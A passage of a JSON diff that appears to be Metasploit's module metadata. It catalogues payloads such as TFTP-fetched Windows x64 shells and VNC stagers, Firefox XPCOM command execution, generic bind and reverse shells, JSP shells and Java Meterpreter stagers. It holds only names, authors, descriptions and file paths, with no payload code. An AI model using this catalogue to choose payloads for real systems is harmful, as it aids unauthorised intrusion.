"cmd/windows/tftp/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/shell_reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/tftp/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": 
"Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": 
"windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": 
"cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_rc4": { + "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": 
"windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_http": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + 
"arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_https": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": 
"windows/x64/reverse_https" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4": { + "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + 
"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": 
"windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttp": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttps": { + "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + 
"platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_firefox/exec": { + "name": "Firefox XPCOM Execute Command", + "fullname": "payload/firefox/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "This module runs a shell command on the target OS without touching the disk.\n On Windows, this command will flash the command prompt momentarily.\n This can be avoided by setting WSCRIPT to true, which drops a jscript\n \"launcher\" to disk that hides the prompt.", + "references": [], + "platform": "Firefox", + "arch": "firefox", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/firefox/exec.rb", + "is_install_path": true, + "ref_name": "firefox/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_firefox/shell_bind_tcp": { + "name": "Command Shell, Bind TCP (via Firefox XPCOM script)", + "fullname": "payload/firefox/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": 
"Creates an interactive shell via Javascript with access to Firefox's XPCOM API", + "references": [], + "platform": "Firefox", + "arch": "firefox", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/firefox/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "firefox/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_firefox/shell_reverse_tcp": { + "name": "Command Shell, Reverse TCP (via Firefox XPCOM script)", + "fullname": "payload/firefox/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API", + "references": [], + "platform": "Firefox", + "arch": "firefox", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/firefox/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "firefox/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/custom": { + "name": "Custom Payload", + "fullname": "payload/generic/custom", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie " + ], + "description": "Use custom string or file as payload. 
Set either PAYLOADFILE or\n PAYLOADSTR.", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/custom.rb", + "is_install_path": true, + "ref_name": "generic/custom", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/debug_trap": { + "name": "Generic x86 Debug Trap", + "fullname": "payload/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "robert " + ], + "description": "Generate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/debug_trap.rb", + "is_install_path": true, + "ref_name": "generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/shell_bind_aws_ssm": { + "name": "Command Shell, Bind SSM (via AWS API)", + "fullname": "payload/generic/shell_bind_aws_ssm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell using AWS SSM", + "references": [ + 
"URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" + ], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb", + "is_install_path": true, + "ref_name": "generic/shell_bind_aws_ssm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/shell_bind_tcp": { + "name": "Generic Command Shell, Bind TCP Inline", + "fullname": "payload/generic/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "generic/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/shell_reverse_tcp": 
{ + "name": "Generic Command Shell, Reverse TCP Inline", + "fullname": "payload/generic/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "generic/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/ssh/interact": { + "name": "Interact with Established SSH Connection", + "fullname": "payload/generic/ssh/interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Interacts with a shell on an established SSH connection", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/payloads/singles/generic/ssh/interact.rb", + "is_install_path": true, + "ref_name": "generic/ssh/interact", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/tight_loop": { + "name": "Generic x86 Tight Loop", + "fullname": "payload/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jduck " + ], + "description": "Generate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/tight_loop.rb", + "is_install_path": true, + "ref_name": "generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_java/jsp_shell_bind_tcp": { + "name": "Java JSP Command Shell, Bind TCP Inline", + "fullname": "payload/java/jsp_shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/java/jsp_shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "java/jsp_shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_java/jsp_shell_reverse_tcp": { + "name": "Java JSP Command Shell, Reverse TCP Inline", + "fullname": "payload/java/jsp_shell_reverse_tcp", 
+ "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux,OSX,Solaris,Unix,Windows", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "java/jsp_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_java/meterpreter/bind_tcp": { + "name": "Java Meterpreter, Java Bind TCP Stager", + "fullname": "payload/java/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Java.\n\nListen for a connection", + "references": [], + "platform": "Java", + "arch": "java", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/java/bind_tcp.rb", + "is_install_path": true, + "ref_name": "java/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "java/meterpreter", + "stager_refname": "java/bind_tcp" + }, + "payload_java/meterpreter/reverse_http": { + "name": "Java Meterpreter, Java Reverse HTTP Stager", + "fullname": "payload/java/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "hdm " + ], + "description": "Run a 
